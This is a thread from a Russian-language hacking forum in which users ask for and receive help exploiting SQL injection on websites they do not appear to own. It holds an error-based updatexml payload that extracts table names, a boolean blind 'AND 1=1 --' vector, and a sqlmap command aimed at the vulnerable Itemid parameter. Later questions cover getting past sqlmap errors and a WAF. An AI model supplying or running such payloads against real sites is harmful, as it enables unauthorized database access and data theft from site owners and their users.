ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

01.06.2018, 18:56
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме: 104689
Репутация:
1
|
|
Сообщение от RWD
↑
Было не раз такое.
Похоже что это не скуля, а просто ошибка.
не не это скуля
я иногда такие раскручивал но ща не получается
и там по ошибке ясно что скуля
|
|
|

04.06.2018, 00:39
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме: 14367
Репутация:
0
|
|
Здравствуйте, есть сайт с sqj inject site.com/trata=0 or updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--.
Как мне его скормить эту уязвимость sqlmaпу что б я уже с ней мог в нем работать, вывод таблиц, парсинг информации и тд. Спасибо
|
|
|

07.06.2018, 18:27
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме: 8978
Репутация:
0
|
|
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
.SpoilerTarget" type="button">Spoiler
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content &type=atom&view=category
Есть ли тут sql?
|
|
|

07.06.2018, 18:41
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от GoodBoy
↑
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
Spoiler
http://site.com/index.php?Itemid=41
+AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content &type=atom&view=category
Есть ли тут sql?
Да есть.
|
|
|

07.06.2018, 18:59
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме: 8978
Репутация:
0
|
|
Спасибо за ответ. Не составит ли вам труда показать пример запроса под этот случай? И как вы определили, что тут присутствует инъекция?
|
|
|

07.06.2018, 19:03
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от GoodBoy
↑
Доброго времени суток. Решил пробежать один сайт при помощи sqlmap --crawl.
Он нашел один параметр и начал крутить, но неудачно.
Spoiler
http://site.com/index.php?Itemid=41
+AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content &type=atom&view=category
Есть ли тут sql?
Нет проблем:
Он нашел один параметр и начал крутить.
Запрос:
Код HTML:
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
Это Blind Boolean Based вектор
|
|
|

07.06.2018, 19:12
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме: 8978
Репутация:
0
|
|
Сообщение от BabaDook
↑
Нет проблем:
Он нашел один параметр и начал крутить.
Запрос:
Код HTML:
http://site.com/index.php?Itemid=41 +AND+1%3D1+--+&format=feed&id=17&layout=blog&option=com_content&type=atom&view=category
Это Blind Boolean Based вектор
А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?
|
|
|

07.06.2018, 19:14
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от GoodBoy
↑
А как задать это в sqlmap, тут уязвимый параметр itemid или id? Что писать в --data?
sqlmap -u ' http://site.com/index.php?Itemid=41&format=feed&id=17&layout=blog&option=com_conten t&type=atom&view=category' -p Itemid
Itemid.
Не надо ничего в --data
|
|
|

08.06.2018, 18:05
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме: 8978
Репутация:
0
|
|
Как с этим бороться: "unable to retrieve the number of database"?
--no-cast --hex не помогает
|
|
|

10.06.2018, 00:52
|
|
Познающий
Регистрация: 24.07.2017
Сообщений: 32
Провел на форуме: 8978
Репутация:
0
|
|
Может ли SQLMap выдавать ложные payload-ы для инъекций? (Не определяется даже тип БД, хотя SQLMap сказал, что параметр уязвим) Или это WAF мешает?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|